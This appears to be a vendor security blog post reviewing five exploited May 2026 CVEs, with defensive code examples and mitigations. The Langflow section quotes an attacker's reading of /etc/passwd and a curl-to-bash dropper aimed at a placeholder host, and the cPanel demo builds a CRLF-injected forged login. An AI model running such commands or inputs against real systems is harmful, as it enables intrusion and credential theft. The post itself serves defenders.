
For four of the five CVEs that mattered most in May 2026, the patch was already sitting on a vendor page when the attacks started. The bug that did the most damage had a fix out two months before it even got a CVE number. Start there, because it shows the pattern at its worst.

cPanel and WHM run a large slice of the world's shared hosting. The software sits on infrastructure serving roughly 70 million domains, and Rapid7's Shodan data puts about 1.5 million instances directly on the public internet. WHM is the root-level admin layer. Whoever controls it controls every site, database, mailbox, and DNS zone on the host. On shared hosting, that is one login standing between an attacker and thousands of unrelated websites.
CVE-2026-41940 removed that login entirely.
cPanel described the bug in its release notes as “an issue with session loading and saving.” The reality is a carriage-return line-feed injection in the login flow of cpsrvd, the cPanel service daemon. Before authentication finishes, cpsrvd writes a session file to disk. An attacker drops an expected segment from the whostmgrsession cookie, which skips the encryption normally applied to that value, then injects raw \r\n characters through a malicious basic-auth header. The daemon writes those attacker-controlled fields into the session file without sanitizing them. A quirk in how cPanel caches sessions promotes the injected data into a privileged login.
In practice, the attacker reaches a login page on TCP 2083 or 2087, sends a short run of crafted requests, and the next request hands back a forged administrative session. No password. CVSS 9.8.
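The mechanism is ordinary CRLF injection into a line-oriented record. The sketch below, added here and not cPanel's code, models the two halves of it: a session writer that copies a header-derived value straight into the record, beside one that refuses any control character first. The key=value session layout, the field names and the "later key wins" loader are assumptions made for the illustration; cpsrvd's real on-disk format is not described on this page.

```python
import base64
import re
from typing import Dict

# Characters that must never reach a line-oriented session record.
_CTL = re.compile(r"[\r\n\x00]")


def parse_basic_auth(header: str) -> str:
    """Decode an HTTP 'Basic <base64>' header and return the user part."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    decoded = base64.b64decode(blob).decode("latin-1")
    user, _, _password = decoded.partition(":")
    return user


def write_session_vulnerable(user: str, remote_ip: str) -> str:
    """Pre-fix shape: header-derived values are copied verbatim into the
    record, so a CRLF inside one of them starts a new, client-chosen line."""
    return f"ip={remote_ip}\nprivileged=0\nuser={user}\n"


def write_session_hardened(user: str, remote_ip: str) -> str:
    """Fixed shape: a control character in any header-derived value rejects
    the request before a session record exists at all."""
    for name, value in (("user", user), ("ip", remote_ip)):
        if _CTL.search(value):
            raise ValueError(f"control character in {name}")
    return f"ip={remote_ip}\nprivileged=0\nuser={user}\n"


def load_session(record: str) -> Dict[str, str]:
    """Line-oriented loader; like many such parsers, a repeated key is
    simply overwritten by the later occurrence."""
    fields: Dict[str, str] = {}
    for line in record.splitlines():      # splits on \n and \r\n alike
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def demo():
    """Feed one constructed header through both writers. Returns the
    privilege flag the loader reads back from the vulnerable record and
    whether the hardened writer refused the same input."""
    forged_user = "guest\r\nprivileged=1"          # constructed test input
    creds = base64.b64encode(f"{forged_user}:x".encode()).decode()
    user = parse_basic_auth("Basic " + creds)
    loaded = load_session(write_session_vulnerable(user, "203.0.113.5"))
    try:
        write_session_hardened(user, "203.0.113.5")
        refused = False
    except ValueError:
        refused = True
    return loaded["privileged"], refused
```

The point for defenders is the ordering: validation has to happen before the record is created, not after, because the "quirk" the text mentions is downstream of the write and cannot undo it.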
Here is the part that should bother you. The patch shipped on April 28, 2026, and the CVE was assigned on April 29. Hosting provider KnownHost reported exploitation in the wild going back to roughly February 23. That is a working zero-day live for about two months. watchTowr published a proof-of-concept on April 29, and CISA added it to the Known Exploited Vulnerabilities catalog shortly after.
If a cPanel server ran an unpatched build during that window, patching now is not enough. Treat it as compromised. Update every install for its release tier, restart cpsrvd, rotate credentials, and audit the session directory for forged entries. If you cannot patch immediately, block ports 2083, 2087, 2095, and 2096, or stop cpsrvd and cpdavd.
The same gap shows up in the next four, just at different speeds.
| CVE | Product | CVSS | Type | Exploited | Fix |
|---|---|---|---|---|---|
| CVE-2026-41940 | cPanel & WHM | 9.8 | Pre-auth bypass | ~2 months pre-patch | cPanel 11.136.0.5 + back-ports |
| CVE-2026-31431 | Linux kernel | 7.8 | Local priv-esc | Public PoC, in KEV | Per-distro kernel updates |
| CVE-2026-33017 | Langflow | 9.3 | Unauth RCE | Within 20 hours | Langflow 1.9.0 |
| CVE-2026-21858 | n8n | 10.0 | Unauth file read to RCE | Active scanning, PoC | n8n 1.121.0 |
| CVE-2026-41103 | MS SSO (Jira & Confluence) | 9.1 | Auth bypass | “Exploitation More Likely” | May Patch Tuesday |
Some of these were first disclosed before May. All five drove active exploitation and defender attention through the month.

CVE-2026-31431 scores a 7.8, the lowest number on this list, and it is arguably the most dangerous one to live with undetected.
It hands any unprivileged local user root on nearly every major Linux distribution shipped since 2017. Theori found it, partly with their AI-assisted scanning tool, and a reliable public exploit is already circulating. CISA put it in KEV.
The flaw sits in the kernel's algif_aead module, the AEAD socket interface of the userspace crypto API. Three reasonable changes stacked up to create it over more than a decade: an AEAD wrapper added in 2011, AF_ALG socket support in 2015, and an in-place optimization in 2017. Together, they let an unprivileged user write a few controlled bytes into the kernel's page-cache copy of any readable file, including setuid-root binaries. Corrupt the right structure, and the process escalates to UID 0.
The score stays low because exploitation needs local access. What makes it dangerous is stealth. The change exists only in the page cache, never on disk, so file-integrity checks and disk forensics see a clean file, and a reboot wipes the evidence. An attacker who already has a shell, whether a low-privileged user, a cracked service account, or a container workload, opens an AF_ALG socket, points it at a crypto transform, and rewrites a privileged binary in memory. In containers, the same trick enables escape and lateral movement across a shared host. Catching it requires runtime telemetry, since nothing on disk will ever look wrong.
Patch the kernel for your distro and prioritize Kubernetes nodes and CI/CD runners. Ubuntu 26.04 and later are not affected. If no patched kernel is ready, disable the module by writing `install algif_aead /bin/false` under `/etc/modprobe.d/` and unloading it. That workaround leaves dm-crypt/LUKS, kTLS, IPsec, OpenSSL, GnuTLS, NSS, and SSH working.
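Because the workaround has two halves, the install override and the unload, a fleet check should verify both. The script below is an added example, not from the advisory or any distro: it parses `/proc/modules` and the `.conf` files under `/etc/modprobe.d/` and classifies a host. The sample file contents are constructed; on a real host `assess_host()` reads the live files.

```python
import re
from pathlib import Path
from typing import Iterable, Set

MODULE = "algif_aead"

# Only an 'install' override stops every load path; a 'blacklist' line alone
# only suppresses alias-based autoloading (see modprobe.d(5)).
_INSTALL_OVERRIDE = re.compile(r"^\s*install\s+(\S+)\s+/bin/(?:false|true)\b")


def loaded_modules(proc_modules: str) -> Set[str]:
    """Module names from /proc/modules ('name size refcount deps state addr')."""
    return {line.split()[0] for line in proc_modules.splitlines() if line.strip()}


def install_blocked(conf_texts: Iterable[str], module: str = MODULE) -> bool:
    """True if any modprobe.d snippet disables `module` with an install override."""
    for text in conf_texts:
        for line in text.splitlines():
            m = _INSTALL_OVERRIDE.match(line)
            if m and m.group(1) == module:
                return True
    return False


def assess(proc_modules: str, conf_texts: Iterable[str], module: str = MODULE) -> str:
    """Classify the workaround state of one host from its file contents."""
    loaded = module in loaded_modules(proc_modules)
    blocked = install_blocked(list(conf_texts), module)
    if blocked and not loaded:
        return "mitigated"
    if blocked and loaded:
        return "blocked-but-loaded"   # override present; the unload is still missing
    if not blocked and not loaded:
        return "loadable"             # not resident now, but nothing prevents loading
    return "exposed"


def assess_host(modprobe_dir: str = "/etc/modprobe.d") -> str:
    """Live check against the running system."""
    proc = Path("/proc/modules").read_text()
    confs = [p.read_text() for p in Path(modprobe_dir).glob("*.conf")]
    return assess(proc, confs)


if __name__ == "__main__":
    print(assess_host())
```

"blocked-but-loaded" is the state most likely to slip through: the config file is in place, the next reboot would be fine, but the module is still resident until someone runs the unload.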

CVE-2026-33017 is the clearest argument against waiting for proof-of-concept code before you patch.
Langflow builds AI agents and RAG pipelines, so it sits next to OpenAI, Anthropic, and AWS keys, database strings, and cloud tokens. The advisory went public on March 17. Sysdig observed exploitation within 20 hours, with no public PoC in existence. Attackers built working exploits from the advisory text alone and started harvesting API keys.
The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint is unauthenticated by design, meant to let anyone run a stored public flow. The flaw is an optional `data` parameter. Supply it, and the endpoint runs attacker-controlled Python from the request instead of the stored flow. That code reaches `prepare_global_scope()` in `validate.py`, which calls `exec()` with no sandbox. One unauthenticated request, code execution as the server process, CVSS 9.3.
Sysdig documented the real kill chain: directory and credential listing with `cat /etc/passwd`, a fingerprint via `id`, then a second-stage dropper pulled with `bash -c "$(curl -fsSL http://<attacker>/z)"` from pre-staged infrastructure. The payoff is the model-provider keys Langflow stores, so one server compromise becomes a breach of every account whose token lives there. This is the second unauthenticated RCE to hit the same unsandboxed exec() path, after CVE-2025-3248 last year.
Upgrade to Langflow 1.9.0, which forces the endpoint to build from stored data only. Until then, block /api/v1/build_public_tmp/ at your proxy, keep Langflow off the public internet, and rotate every key reachable from an exposed instance.
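The shape of the fix is simple to state: an unauthenticated build endpoint must take its flow definition from the server's store and from nowhere else. The model below is an added example, not Langflow's code. The flow store, the request dictionary and the handler names are assumptions; the behaviour the hardened handler implements is the one the text attributes to 1.9.0, and `proxy_blocks` is the interim edge rule from the paragraph above.

```python
from typing import Any, Dict

# Constructed store of saved flows, keyed by flow_id (assumed shape).
FLOW_STORE: Dict[str, Dict[str, Any]] = {
    "flow-public": {"public": True, "nodes": [{"id": "n1", "type": "Prompt"}]},
    "flow-private": {"public": False, "nodes": [{"id": "n2", "type": "Secret"}]},
}


class Forbidden(Exception):
    """Flow missing or not public; the endpoint has no other authorization."""


class BadRequest(Exception):
    """Client tried to supply flow data on an unauthenticated build."""


def _stored_public_flow(flow_id: str) -> Dict[str, Any]:
    flow = FLOW_STORE.get(flow_id)
    if flow is None or not flow["public"]:
        raise Forbidden(flow_id)
    return flow


def build_public_tmp_vulnerable(flow_id: str, body: Dict[str, Any]) -> Dict[str, Any]:
    """Pre-1.9.0 shape: an optional 'data' field replaces the stored flow, so the
    build (and, on the real code path, exec()) runs whatever the client sent."""
    flow = _stored_public_flow(flow_id)
    if body.get("data") is not None:
        return body["data"]
    return {"nodes": flow["nodes"]}


def build_public_tmp_hardened(flow_id: str, body: Dict[str, Any]) -> Dict[str, Any]:
    """Fixed shape: build from stored data only. A client-supplied 'data' is a
    hard error rather than silently ignored, so the attempt shows up in logs."""
    flow = _stored_public_flow(flow_id)
    if "data" in body:
        raise BadRequest("data is not accepted on the public build endpoint")
    return {"nodes": flow["nodes"]}


def proxy_blocks(method: str, path: str) -> bool:
    """Interim edge rule from the text: refuse the endpoint until the upgrade lands."""
    return path.startswith("/api/v1/build_public_tmp/")
```

Rejecting rather than ignoring the extra field costs nothing for legitimate callers, who never send it, and turns every probe into a loggable 400.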

CVE-2026-21858 carries the only perfect 10.0 on this list, and the score deserves a caveat that matters for triage.
n8n has over 100 million Docker pulls and connects into Google Drive, Salesforce, OpenAI, CI/CD, and payment processors. Cyera found the flaw, named it Ni8mare, and counted around 100,000 servers potentially exposed. Shadowserver saw 105,753 unpatched instances at first and still 59,558 by January 11. VulnCheck has since recorded broad scanning and exploit attempts, including Zerobot.
Every inbound webhook and form request runs through `parseRequestBody()`, which picks a parser from the `Content-Type` header. The file-handling path runs without confirming the type is `multipart/form-data`, so an attacker can overwrite the internal `req.body.files` object. On a server with a custom form that accepts uploads and does not validate content type, this becomes an unauthenticated file read. Read the right files and you pull secrets and forge an admin session token. With admin access, n8n's built-in Execute Command node runs host commands by design, so the chain ends in RCE with no second vulnerability needed.
The 10.0 applies in full only when the instance is reachable and runs a vulnerable upload form. Most n8n deployments sit internally behind a VPN, where Ni8mare works as a post-compromise accelerator that widens the blast radius once an attacker is already on the network. The urgent population is the tens of thousands of self-hosted Docker instances sitting directly on the internet.
Upgrade to n8n 1.121.0, the only real remediation. Keep n8n off the public internet, review custom forms that accept uploads, and watch for requests with mismatched `Content-Type` headers, unexpected admin session creation, and new workflows calling the Execute Command node.
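The bug class is a confusion between client-controlled and server-owned parts of a parsed request. The example below is added here and is not n8n's code; the dispatcher shape, the body dictionary and the minimal multipart reader are assumptions standing in for the real `parseRequestBody()`. It shows the overwrite the paragraph above describes, the two changes that close it (only the multipart branch may populate `files`, and the file-handling step checks the type itself), and the header/body mismatch check the remediation list asks you to watch for.

```python
import json
import re
from typing import Any, Dict

_BOUNDARY = re.compile(r'boundary="?([^";]+)"?')


def parse_uploads(content_type: str, raw: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data reader: {filename: content} for parts that
    carry a filename. Enough for the example, not a full RFC 7578 parser."""
    m = _BOUNDARY.search(content_type)
    if not m:
        raise ValueError("multipart body without boundary")
    delim = b"--" + m.group(1).encode()
    files: Dict[str, bytes] = {}
    for part in raw.split(delim)[1:]:
        if part.startswith(b"--"):            # closing delimiter
            break
        head, _, body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        fm = re.search(rb'filename="([^"]*)"', head)
        if fm:
            files[fm.group(1).decode()] = body.rstrip(b"\r\n")
    return files


def parse_request_body_vulnerable(content_type: str, raw: bytes) -> Dict[str, Any]:
    """Pre-fix shape: the JSON branch merges the decoded object into the body,
    so a client key named 'files' overwrites the server-owned upload map."""
    body: Dict[str, Any] = {"data": {}, "files": {}}
    if content_type.startswith("multipart/form-data"):
        body["files"] = parse_uploads(content_type, raw)
    elif content_type.startswith("application/json"):
        body.update(json.loads(raw))
    return body


def parse_request_body_hardened(content_type: str, raw: bytes) -> Dict[str, Any]:
    """Fixed shape: only the multipart parser may populate 'files'; a JSON
    body lands under 'data' and never touches the top level."""
    body: Dict[str, Any] = {"data": {}, "files": {}}
    if content_type.startswith("multipart/form-data"):
        body["files"] = parse_uploads(content_type, raw)
    elif content_type.startswith("application/json"):
        body["data"] = json.loads(raw)
    return body


def read_uploaded_files(content_type: str, body: Dict[str, Any]) -> Dict[str, bytes]:
    """File-handling step with the missing check restored: refuse to look at
    'files' unless the request really was multipart."""
    if not content_type.startswith("multipart/form-data"):
        raise ValueError("file handling reached for a non-multipart request")
    return body["files"]


def content_type_mismatch(content_type: str, raw: bytes) -> bool:
    """Detection hint from the text: flag requests whose declared type does
    not match how the body actually begins."""
    head = raw.lstrip()[:2]
    if content_type.startswith("application/json"):
        return not (head.startswith(b"{") or head.startswith(b"["))
    if content_type.startswith("multipart/form-data"):
        m = _BOUNDARY.search(content_type)
        return m is None or not raw.startswith(b"--" + m.group(1).encode())
    return False
```

`content_type_mismatch` is cheap enough to run in a reverse proxy or WAF rule in front of the webhook path, and a spike in mismatches against a form endpoint is the kind of signal the text says to watch for, whether or not the instance is patched yet.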

May was quiet. It was the first Patch Tuesday with no exploited or publicly disclosed zero-day since June 2024. Out of 14 flaws scoring 9.0 or higher, Microsoft flagged exactly one as “Exploitation More Likely,” and that is CVE-2026-41103.
It is an authentication bypass in Microsoft's SAML SSO plugins for Jira and Confluence, two systems holding source code, tickets, and internal docs for a lot of engineering teams. The root cause is an incorrect implementation of an authentication algorithm. As Action1's Mike Walters described it, an unauthenticated attacker sends a crafted SSO response during login and tricks the system into accepting a forged identity, without proper Microsoft Entra ID authentication. The plugin trusts an assertion it should reject and issues a valid session for any account the attacker names. Microsoft classifies it as elevation of privilege. The practical effect is signing in as someone else without their credentials, at CVSS 9.1.
A quiet month invites an orderly rollout, and that is the trap. An SSO bypass converts a single network-reachable flaw into access across everything behind the identity layer. The “Exploitation More Likely” tag is Microsoft's own forward-looking call, so patch this on the normal cycle and resist treating a slow month as room to defer.
Apply the May Patch Tuesday updates for the Jira and Confluence SAML SSO plugins, restrict the SSO endpoints to trusted networks during rollout, and audit auth logs for SAML logins with no matching Entra ID event.
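The audit step above is a correlation problem: every genuine SAML login should be preceded, within seconds, by a successful sign-in at the identity provider for the same user and application. The script below is an added example, not from Microsoft or Atlassian. Both log sets are constructed and their field names are assumptions; a real run needs a field mapping from the Jira/Confluence audit log and the Entra ID sign-in export, and the window and skew values are starting points to tune.

```python
from datetime import datetime
from typing import Dict, List

# Constructed application-side login events (SAML plugin style).
APP_LOGINS: List[Dict[str, str]] = [
    {"ts": "2026-05-13T09:00:05Z", "user": "alice@example.com", "method": "saml",     "src": "10.0.0.5"},
    {"ts": "2026-05-13T09:02:11Z", "user": "admin@example.com", "method": "saml",     "src": "198.51.100.7"},
    {"ts": "2026-05-13T09:03:00Z", "user": "bob@example.com",   "method": "password", "src": "10.0.0.9"},
    {"ts": "2026-05-13T09:05:30Z", "user": "carol@example.com", "method": "saml",     "src": "10.0.0.12"},
]

# Constructed identity-provider sign-in events (Entra ID style), successes only.
IDP_SIGNINS: List[Dict[str, str]] = [
    {"ts": "2026-05-13T08:59:58Z", "user": "Alice@example.com", "app": "Jira"},
    {"ts": "2026-05-13T09:05:25Z", "user": "carol@example.com", "app": "Confluence"},
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def unmatched_saml_logins(app_logins: List[Dict[str, str]],
                          idp_signins: List[Dict[str, str]],
                          app: str, window_s: int = 120, skew_s: int = 30) -> List[Dict[str, str]]:
    """Return SAML logins to `app` with no IdP sign-in for the same user and
    the same app in [login - window_s, login + skew_s]. The IdP authenticates
    first and then issues the response, so its event normally precedes the
    application's; skew_s tolerates clock drift between the two systems."""
    by_user: Dict[str, List[datetime]] = {}
    for ev in idp_signins:
        if ev["app"] == app:
            by_user.setdefault(ev["user"].lower(), []).append(parse_ts(ev["ts"]))
    flagged: List[Dict[str, str]] = []
    for ev in app_logins:
        if ev["method"] != "saml":
            continue
        t = parse_ts(ev["ts"])
        candidates = by_user.get(ev["user"].lower(), [])
        if not any(-skew_s <= (t - s).total_seconds() <= window_s for s in candidates):
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in unmatched_saml_logins(APP_LOGINS, IDP_SIGNINS, "Jira"):
        print(f"{ev['ts']} {ev['user']} from {ev['src']}: SAML login without IdP sign-in")
```

Matching on the application as well as the user matters: a sign-in to Confluence does not vouch for a login to Jira, and an assertion forged for one service provider is exactly the case where only the application name differs. Case-folding the user principal avoids false positives from the two systems disagreeing on capitalization.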
A hosting panel, a kernel, two AI automation tools, and an identity layer. Five products with nothing in common except that the fix was available while the attacks were already running. A CVSS score tells you the ceiling on damage. It says nothing about which flaws are being used right now, which of your assets are exposed, or how far an intruder gets once inside, and those three answers are what decide your patch order.
The Strobes Vulnerability Intelligence platform tracks that live context, exploit availability, real exposure, and priority that shifts as the threat does. Start at strobes.co/vi.